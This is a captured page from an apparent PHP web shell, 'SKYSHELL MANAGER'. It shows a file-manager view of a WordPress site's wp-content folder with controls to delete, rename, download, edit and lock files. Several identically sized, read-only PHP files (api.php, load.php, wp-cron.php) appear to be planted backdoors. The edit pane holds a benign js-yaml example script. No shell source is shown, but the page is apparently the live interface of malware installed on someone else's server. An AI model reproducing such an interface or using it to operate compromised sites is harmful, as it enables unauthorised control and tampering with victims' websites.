📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: sample_document.js
'use strict'; /*eslint-disable no-console*/ var fs = require('fs'); var path = require('path'); var util = require('util'); var yaml = require('../'); try { var filename = path.join(__dirname, 'sample_document.yml'), contents = fs.readFileSync(filename, 'utf8'), data = yaml.load(contents); console.log(util.inspect(data, false, 10, true)); } catch (err) { console.log(err.stack || String(err)); }
Save